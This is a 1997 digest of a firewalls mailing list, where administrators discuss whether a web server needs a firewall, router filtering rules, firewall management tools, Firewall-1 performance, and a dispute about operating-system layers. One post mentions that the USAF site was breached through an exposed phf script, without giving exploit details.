Precedence: bulk

Steve wrote: > > Eric K. Dickinson wrote: > > > > I am wondering if this is a suitable solution. Could one not set up a passive > > defence by over writing the presented home-pages at a predetermined time and > > at some other trigger such as a write or copy. Any unauthorized action could > > also be used as a trigger to just "over write". The real home-page could be > > anywhere accessible only by the OS itself or another hardened location not > > presented to the world. I am used to the Unix world and have more experience > > there than NT. > > > > Any Ideas? Thoughts? Or is this out in left field?
> > > > eric@nova.dcrt.nih.gov > > Eric, > > A very interesting thought..but firewalls are supposed to prevent users > from being able to tamper in the first place. But, I for one am going > to give that more serious consideration as I see its possibilities for > use on maybe another machine on the LAN to check on the status of say a > web server. Thanks for the idea.. > > Steve > Steve@hon.com > sdg consulting

2 things:

1. I disagree with the statement about firewalls.... some find it more palatable to put the web server OUTSIDE the firewall and not let ANYONE through

2. the idea of re-writing the files regularly on the web server is a good one.... we do something similar to rdist's binary compare and unconditionally re-write that which differs from the "master" copy stored well within our security perimeter.

We also subscribe to 1 above and do NOT trust our web server in any way.... if it's crashed, we know it quickly, restore from a recent backup, and go on with our lives.

-- [~]========================================================================[~] | Patrick Larkin Jr. Systems Administrator | | Ah, but Unix IS a User Friendly OS! It's just picky about its friends!
| [_]========================================================================[_]

From firewalls-owner Tue Jan 7 13:27:47 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA07522 for firewalls-outgoing; Tue, 7 Jan 1997 12:58:39 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA07515 for ; Tue, 7 Jan 1997 12:58:29 -0800 (PST) Received: from elvis.vnet.net (elvis.vnet.net [166.82.1.5]) by ginger.vnet.net (8.8.2/8.8.2) with ESMTP id QAA18613 for ; Tue, 7 Jan 1997 16:05:48 -0500 Received: from sdg (galip.vnet.net [166.82.174.200]) by elvis.vnet.net (8.8.4/8.8.4) with SMTP id NAA20669 for ; Tue, 7 Jan 1997 13:15:10 -0500 (EST) Message-ID: <32D2913C.91E@hon.com> Date: Tue, 07 Jan 1997 13:12:49 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: To Firewall or Not to Firewall? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

HI, I have been viewing this list for several weeks now and it seems that the general consensus is that a firewall is needed in ALL cases. What I am wondering is what if the only connection to the Internet is a Website? And what if the WebSite software has its own built-in security such as O'Reilly's WebSite does? Is a firewall _still_ necessary? Thanks for any responses..I would hope that others would be wondering this also, not just myself, and any responses would benefit many.
Steve Steve@hon.com sdg consulting From firewalls-owner Tue Jan 7 14:35:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA10449 for firewalls-outgoing; Tue, 7 Jan 1997 13:57:43 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA10442 for ; Tue, 7 Jan 1997 13:57:32 -0800 (PST) Received: by hidata.com; id AA29310; Tue, 7 Jan 97 13:57:15 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma029308; Tue, 7 Jan 97 13:57:08 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFCA2.8B7D3240@oscntsrv.hidata.com>; Tue, 7 Jan 1997 13:56:13 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: Multi-FW Gateway management GUI Date: Tue, 7 Jan 1997 13:56:12 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm collecting basic requirements for FW-farm management applications for an internal instructional document. What I've thought of so far is the following: 1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states. 2. The ability to select a proxy and view configuration information on that proxy on a specific gateway. 3. The ability to delegate departmental security. 4. The ability to manage individual user authentication per proxy. 5. The ability to centrally view logs. 6. The ability to send pages on specific events. 7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring. 8. A sanity-check utility which looks for obvious proxy filter configuration errors. 9. 
A tripwire utility to display alerts on file and process state changes. 10. 'Courtney' for farms? 11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc). 12. Time synchronization verification for accurate log comparisons. 13. Strongly encrypted and authenticated administrative channels. 14. Load balancing?

Comments? Which are overkill and which should I add?

Bill Stout

From firewalls-owner Tue Jan 7 16:32:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17938 for firewalls-outgoing; Tue, 7 Jan 1997 16:08:58 -0800 (PST) Received: from unix1.sysnet.net (unix1.sysnet.net [206.142.32.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA17890 for ; Tue, 7 Jan 1997 16:08:36 -0800 (PST) Received: from [206.142.16.35] (bppp1.sysnet.net [206.142.16.35]) by unix1.sysnet.net (8.8.4/8.6.12) with SMTP id UAA14304 for ; Tue, 7 Jan 1997 20:36:39 -0500 (EST) Message-Id: <199701080136.UAA14304@unix1.sysnet.net> Subject: USAF: how it was hacked Date: Tue, 7 Jan 97 19:09:39 -0400 x-sender: patton@mail.sysnet.net x-mailer: Claris Emailer 1.1 From: Matthew Patton To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

No, this isn't about cdrom based web content. Really quite anticlimactic. The infamous phf script was left active on the server and was how they got in. Root, the whole 9 yards. What's really funny is that no more than a week prior to the incident, I suggested to ASSIST (the military's equiv of CERT, and now financial sponsor of same) that in light of the minor poking around I did on a handful of military web sites, that they needed to get the word out to admins because so many servers were in a high state of misconfiguration and just waiting to be exploited. 7 days later, boom!!
I'm not sure on what grounds people place so much trust in the military to do things right with respect to host and network security. I'm sure there are segments that do a damn fine job, but seeing the abject lack of skills and knowledge in the Pentagon area makes me a mite bit skeptical and not a little ashamed. It's a wonder we don't see high profile exploits on a routine basis. Don't get me wrong, the private sector doesn't have its act together on many fronts either. Now hopefully the thread can die in peace.

From firewalls-owner Tue Jan 7 17:29:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA22531 for firewalls-outgoing; Tue, 7 Jan 1997 17:10:01 -0800 (PST) Received: from mailsorter-1.alma.webtv.net (mailsorter-1.isp.alma.webtv.net [205.180.153.85]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA22524 for ; Tue, 7 Jan 1997 17:09:53 -0800 (PST) Received: from mailtod-1.alma.webtv.net (mailtod-1.iap.alma.webtv.net [207.76.180.81]) by mailsorter-1.alma.webtv.net (8.7.5/8.7.3) with ESMTP id RAA24170; Tue, 7 Jan 1997 17:09:32 -0800 (PST) Received: (from production@localhost) by mailtod-1.alma.webtv.net (8.7.5/8.7.3) id RAA28245; Tue, 7 Jan 1997 17:09:33 -0800 (PST) Message-Id: <199701080109.RAA28245@mailtod-1.alma.webtv.net> From: bigal1@webtv.net (Alfred Lipschitz) Date: Tue, 7 Jan 1997 20:09:33 -0500 To: firewalls@GreatCircle.COM Subject: New Party Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-Transfer-Encoding: 7BIT MIME-Version: 1.0 (WebTV 1.0) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

They contacted , when I respond I get garbage back. Tell them to call me 609-264-0311. Thanks, I appreciate it.
El Producto

From firewalls-owner Tue Jan 7 17:53:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA23322 for firewalls-outgoing; Tue, 7 Jan 1997 17:23:23 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA23283 for ; Tue, 7 Jan 1997 17:22:58 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA26643; Wed, 8 Jan 1997 09:08:41 +0800 (SGT) Message-ID: <32D2F4C6.5DA5@ncs.com.sg> Date: Wed, 08 Jan 1997 09:13:42 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: Steve@hon.com CC: firewalls@GreatCircle.COM Subject: Re: To Firewall or Not to Firewall? References: <199701080101.JAA26202@elm.ncs.com.sg> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Steve once wrote: > > > > HI, > > > > I have been viewing this list for several weeks now and it seems that > > the general consensus is that a firewall is needed in ALL cases. What I > > am wondering is what if the only connection to the Internet is a > > Website? And what if the WebSite software has its own built-in security > > such as O'Reilly's WebSite does? Is a firewall _still_ necessary? > > Thanks for any responses..I would hope that others would be wondering > > this also, not just myself, and any responses would benefit many. > > > > Steve > > Steve@hon.com > > sdg consulting

IMHO, a firewall is necessary as long as you are not running a standalone web server with sole access to the Internet. O'Reilly's WebSite is an application program running over a largely insecure OS platform that will still allow the purposeful prankster to ruin your show for a laugh. The word 'secure', as I looked at it, is history.
Anything considered secured now is relative to the lack or gain of technology and information. And then there are the bugs...... A firewall may not be some screening that you will like, especially when the industry is oddly shifting to the WindowsNT platform. But it will still reduce the odds of a would-be hacker making curtain calls to your website/LAN and provide a misinformed peace of mind to your company's MIS. But if you don't like firewalls, try reducing the number of active ports to the minimal necessity, and delete a whole lot of interesting executables. Security in a networking environment, after all, means inconveniences.

-- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ Flames > /dev/null

From firewalls-owner Tue Jan 7 18:35:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA27488 for firewalls-outgoing; Tue, 7 Jan 1997 18:14:35 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA27370 for firewalls@greatcircle.com; Tue, 7 Jan 1997 18:14:11 -0800 (PST) Received: from relay7.UU.NET by ascb.saturnm.rosmail.com with ESMTP id HAA23178; (8.8.4/vak/1.9) Tue, 7 Jan 1997 07:32:43 +0300 (MSK) Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxkk04152; Mon, 6 Jan 1997 23:30:40 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05177 for firewalls-outgoing; Mon, 6 Jan 1997 15:45:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA05158 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:44:49 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26523 for ; Fri, 3 Jan 1997 07:20:42 -0800 (PST) Received: by mtymail.avantel-icom.com.mx
with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF957.1EE0F1B0@mtymail.avantel-icom.com.mx>; Fri, 3 Jan 1997 09:18:45 -0600 Message-ID: From: Ricardo Alvarado To: "firewalls@GreatCircle.COM" Subject: Re: internal filtering router - filter config? Date: Fri, 3 Jan 1997 09:20:46 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>What type of things would you filter on the internal router? or even >the external router? I am going to be installing a firewall real soon >and would really appreciate any help. > >-steve. >matkoski@dreamscape.com

In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, and leave just mail, web, ftp, etc.

ricardo ralvarado@avantel.com.mx

From firewalls-owner Tue Jan 7 18:40:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA28048 for firewalls-outgoing; Tue, 7 Jan 1997 18:20:20 -0800 (PST) Received: from gargoyle.clark.net (pa1dsp14.dcwt.infi.net [208.136.65.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA28020 for ; Tue, 7 Jan 1997 18:20:05 -0800 (PST) Received: by gargoyle.clark.net (Smail3.1.29.1 #2) id m0vhneH-000EzZC; Tue, 7 Jan 97 21:21 EST Date: Tue, 7 Jan 1997 21:21:49 -0500 (EST) From: "Paul D.
Robertson" X-Sender: proberts@gargoyle To: Wilner@DOCKMASTER.NCSC.MIL cc: firewalls@GreatCircle.COM Subject: Re: Re: NCSA != NCSC In-Reply-To: <970107195334.971794@DOCKMASTER.NCSC.MIL> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Tue, 7 Jan 1997 Wilner@DOCKMASTER.NCSC.MIL wrote:

> Everything except boot-up depends upon the O/S. Nothing is below the "O/S > layer," nor does one speak of such a layer unless one intends "application

Hrm, I'd always considered monitor PROMs to be 'below' the OS since it's unaware of the PROM code running, has no control of the machine at that point, is still loaded in memory, and can be manipulated without its own consent. Hardware debuggers have also always fallen in this category, in my view. Depending on the OS, there can be software, hardware, or firmware memory management operating "under" the OS, especially if that OS is running in a virtual machine, or some other bounded "sandbox"; "the OS" doesn't always mean "the *only* OS".

> layer" and doesn't know an application from an O/S, nor can a single byte be > sent or retrieved over a device (networked or otherwise) unless an O/S is > relied upon, nor can a single access to memory, disk, or what-have-you be

Hmm, that's funny, the PROMs in my Suns seem quite happy to access the console device without Solaris'/SunOS' knowledge. MVS also seemed quite happy running under VM last time I did it, and the controlling OS in the 'OS' stack seemed quite happy to go right up against the real and virtual devices without MVS' say so. Certainly from an MVS applications standpoint things were running 'below' the OS.

> performed by networking code "below the O/S layer," as we so quaintly say, > if there is no O/S involved.

And many OS' rely on firmware code layered beneath them to access the actual devices.
No reason you couldn't do the same for CPU, masking the OS and its applications to some subset of the machine, and enforcing memory, instruction, or device protection.

> Gentlemen, if this represents your understanding of operating systems and > security, please contribute to alt.brush-sellers, not to firewalls.

Care for a broom to ride out on?

Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280

From firewalls-owner Tue Jan 7 19:44:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03463 for firewalls-outgoing; Tue, 7 Jan 1997 19:33:55 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03428 for ; Tue, 7 Jan 1997 19:33:34 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08753; Tue, 7 Jan 1997 19:33:13 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06972; Wed, 8 Jan 1997 11:36:44 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10173; Wed, 8 Jan 1997 11:29:56 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07851; Wed, 8 Jan 1997 11:34:24 +0800 Date: Wed, 8 Jan 1997 11:34:24 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080334.LAA07851@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

----- Begin Included Message ----- From julie.gupta@Eng Tue Jan 7 02:50:29 1997 Date: Mon, 6 Jan 1997 10:56:25 -0800 From: julie.gupta@Eng (Julie Gupta) To: David.Wee@Singapore Subject: Re: FW-1 throughput? Etc.
Cc: elizabeth.purcell@Eng

David, As for the second question, FW-1 2.1 does have a VPN add-on module. Please check the pricelist. SunScreen EFS is also a software solution that provides VPN capability. There is a positioning document on the web on when to use one over the other. They are competitive products. Hope this helps, Julie

> From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. > > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilities of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc.
> > > ----- End Included Message ----- > > ----- End Included Message -----

From firewalls-owner Tue Jan 7 19:48:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01790 for firewalls-outgoing; Tue, 7 Jan 1997 19:09:19 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01728 for ; Tue, 7 Jan 1997 19:08:24 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vhoMt-0004FbC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:07:55 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 8 Jan 97 04:07 MET Received: by lina id m0vhoJh-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:04:37 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: To Firewall or Not to Firewall? To: Steve@hon.com Date: Wed, 8 Jan 1997 04:04:36 +0100 (MET) Cc: firewalls@GreatCircle.COM In-Reply-To: <32D2913C.91E@hon.com> from "Steve" at Jan 7, 97 01:12:49 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello,

> I have been viewing this list for several weeks now and it seems that > the general consensus is that a firewall is needed in ALL cases.

Not really.

> What I > am wondering is what if the only connection to the Internet is a > Website?

It's safe enough to place a packet filter in front of the server (in your ISP access router). But it is then important that there is no net connection to internal hosts. This means all html files need to be uploaded by disk, locally edited or via the net (if you are so daring to allow that method). You will very soon need to connect your office LAN to the web server, or to the internet for WWW surfing.
Then you might consider using a firewall or a stateful NAT box with outgoing-only connections.

Greetings Bernd

From firewalls-owner Tue Jan 7 19:59:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03387 for firewalls-outgoing; Tue, 7 Jan 1997 19:32:45 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03377 for ; Tue, 7 Jan 1997 19:32:33 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08433; Tue, 7 Jan 1997 19:31:49 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06942; Wed, 8 Jan 1997 11:35:18 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10155; Wed, 8 Jan 1997 11:28:31 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07848; Wed, 8 Jan 1997 11:32:59 +0800 Date: Wed, 8 Jan 1997 11:32:59 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080332.LAA07848@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

----- Begin Included Message ----- From elizabeth.purcell@Eng Tue Jan 7 04:10:59 1997 Date: Mon, 6 Jan 1997 12:10:23 -0800 From: elizabeth.purcell@Eng (Elizabeth Purcell) Subject: Re: FW-1 throughput? Etc. Cc: julie.gupta@Eng, elizabeth.purcell@Eng To: David.Wee@Singapore Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-MD5: WJzJXeXl2piZpiPHTTfjYQ==

David, I have firewall throughput information at the url http://netrai4.eng/firewall/firewall.results.new.html. The results were measured on an Ultra 2/2170 with SunSwift network adaptors (100BaseT) at half duplex.
Notice that the cpu utilization for the workstations with the firewalls installed did not come close to saturation. Looking at the SPEC95 info at the url, http://perfwww.eng/tasks/results/spec95, a ss20/71 is about half the cpu performance of an Ultra 2/2170. Hope that this helps. Let me know.. Elizabeth > From gupta@gupta Mon Jan 6 10:49:57 1997 > Date: Mon, 6 Jan 1997 10:56:25 -0800 > From: gupta@gupta (Julie Gupta) > To: David.Wee@Singapore > Subject: Re: FW-1 throughput? Etc. > Cc: elizabeth.purcell@Eng > > Elizabeth, > > Can you help David with his first question? > > Thanks. > > ------------------------------------------- > David, > > As for the second question, FW-1 2.1 does have a VPN add-on module. > Please check the pricelist. SunScreen EFS is also a software solution > that provides VPN capability. There is a positioning document on the > web on when to use one over the other. They are competitive products. > > Hope this helps, > Julie > > > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > > Date: Mon, 6 Jan 1997 15:53:50 +0800 > > From: David.Wee@Singapore (David Wee) > > To: julie.gupta@Corp > > Subject: FW-1 throughput? Etc. > > Cc: David.Wee@Singapore > > > > Julie, > > > > > > Can you please help answer 1 & 2 > > > > > > Regards,david > > ----- Begin Included Message ----- > > > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > > Date: Mon, 6 Jan 1997 15:46:44 -0800 > > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > > To: firewalls@greatcircle.com, dwee@Singapore > > Subject: FW-1 throughput? Etc. > > > > Hello world, > > > > I would be very much obliged if anybody can please answer on this: > > > > 1] How many packets per second can the Solstice Firewall-1 2.1 > > (installed in a Sun Sparcstation 20 with Solaris 2.5) > > process ? In mbps terms? > > 2] Current needs dictate a solution involving FWs with multiple > > secure VPNs to mobile customers.
I like the capabilities of > > FW-1 2.1 very much but I understand that it does not support VPN > > today. Do I need the SunScreen to complement it? :-( > > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > > > Thank you very much for your kindness. :-) > > > > Yours, > > Dexter D. Laggui > > Systems Engineer > > > > drexx@sunphil.mozcom.com > > Philippine Systems Products Inc. > > > > > > ----- End Included Message ----- > > > > ----- End Included Message ----- From firewalls-owner Tue Jan 7 20:14:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04342 for firewalls-outgoing; Tue, 7 Jan 1997 19:47:19 -0800 (PST) Received: from mailbox1.standard.com (netnews.stdin.com [198.107.111.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04314 for ; Tue, 7 Jan 1997 19:46:58 -0800 (PST) Received: from jallen.standard.com (jallen.standard.com [198.182.191.76]) by mailbox1.standard.com (8.7.5/8.7.3) with SMTP id TAA11113; Tue, 7 Jan 1997 19:40:53 -0800 (PST) Date: Tue, 7 Jan 97 19:38:15 -0800 From: John Allen Subject: Re: Multi-FW Gateway management GUI To: "Stout, Bill" , "'Firewall List'" X-Mailer: Chameleon ATX 6.0.1, Standards Based IntraNet Solutions, NetManage Inc. X-Priority: 3 (Normal) References: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --- On Tue, 7 Jan 1997 13:56:12 -0800 So and So named "Stout, Bill" wrote: > I'm collecting basic requirements for FW-farm management > applications for an internal instructional document. > > What I've thought of so far is the following: > > > BLAH BLAH AND BLAH were said > > Comments? Which are overkill and which should I add?
> > Bill Stout > How about a ten million dollar budget - nice bunch of ideas, but you won't get it all to work, I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try. You also need strong partnership with key vendors for distribution and support; without this your product will fail even though your product has all these features. Make it Shareware for $39.00, and you will probably make enough to have an Internet account for a few years. Security software is no laughing matter, and it is usually complex, it usually comes with a disclaimer that whatever it doesn't do - isn't covered - and what it is supposed to do - might not do it. Best of luck. =========================================================================== John Allen E-mail:jallen@standard.com Network Development Group Telephone: (503) 321-6189 Standard Insurance, Portland Oregon FAX: (503) 321-7290 > 1. An initial GUI which allows an administrator to view > multiple gateways, ports, alert status, and proxy states. > > 2. The ability to select a proxy and view configuration > information on that proxy on a specific gateway. > > 3. The ability to delegate departmental security. > > 4. The ability to manage individual user authentication > per proxy. > > 5. The ability to centrally view logs. > > 6. The ability to send pages on specific events. > > 7. If located on the same DMZ subnet as the gateways, > the ability to sniff packets and graphically organize > them, other basic network management monitoring. > > 8. A sanity-check utility which looks for obvious proxy > filter configuration errors. > > 9. A tripwire utility to display alerts on file and process > state changes. > > 10. 'Courtney' for farms? > > 11. Instant traceback utility to collect suspicious host > information (DNS data, traceroute, whois, traffic type, > etc). > > 12. Time synchronization verification for accurate log > comparisons. > > 13.
Strongly encrypted and authenticated administrative channels. > > 14. Load balancing? > > Comments? Which are overkill and which should I add? > > Bill Stout > ---------------End of Original Message----------------- From firewalls-owner Tue Jan 7 20:29:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04930 for firewalls-outgoing; Tue, 7 Jan 1997 19:56:45 -0800 (PST) Received: from dhp.com (dhp.com [199.245.105.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04899 for ; Tue, 7 Jan 1997 19:56:31 -0800 (PST) Received: (from lucifer@localhost) by dhp.com (8.8.4/8.6.12) id WAA20700; Tue, 7 Jan 1997 22:10:40 -0500 Date: Tue, 7 Jan 1997 22:10:40 -0500 Message-Id: <199701080310.WAA20700@dhp.com> To: firewalls@greatcircle.com From: Mixmaster X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service.
Please report X-Comment4: problems or inappropriate use to X-Comment5: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: firewalls@greatcircle.com cc: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON -------- Some people think they are O/S gods just because of a DOCKMASTER address... since WILNER thinks this is a reason to conduct ad-hominem attacks on members of the firewalls list such as MJR (who was around LONG before wilner) I am starting to question whether Wilner@DOCKMASTER.NCSC.MIL is really the NET.LOON Dr. Fred Cohen in Disguise? Anon p.s. Sorry for the noise listmaster!! From firewalls-owner Tue Jan 7 20:45:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01705 for firewalls-outgoing; Tue, 7 Jan 1997 19:08:02 -0800 (PST) Received: from mule1.mindspring.com (mule1.mindspring.com [204.180.128.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01671 for ; Tue, 7 Jan 1997 19:07:36 -0800 (PST) Received: from [207.69.170.21] (user-37kbahh.dialup.mindspring.com [207.69.170.49]) by mule1.mindspring.com (8.8.4/8.8.4) with SMTP id WAA33798; Tue, 7 Jan 1997 22:05:59 -0500 Date: Tue, 7 Jan 1997 22:05:59 -0500 X-Sender: pelicans@pop.mindspring.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Wilner@DOCKMASTER.NCSC.MIL From: pelicans@mindspring.com (BeachCruiser) Subject: Re: Re: NCSA != NCSC Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 2:53 PM 1/7/97, Wilner@DOCKMASTER.NCSC.MIL wrote: >> I have to say up front that I agree with MJR. >> >> . . . if the firewall software is implemented below the O/S layer >> . . . then the O/S will never even "see" . . . > >Everything except boot-up depends upon the O/S.
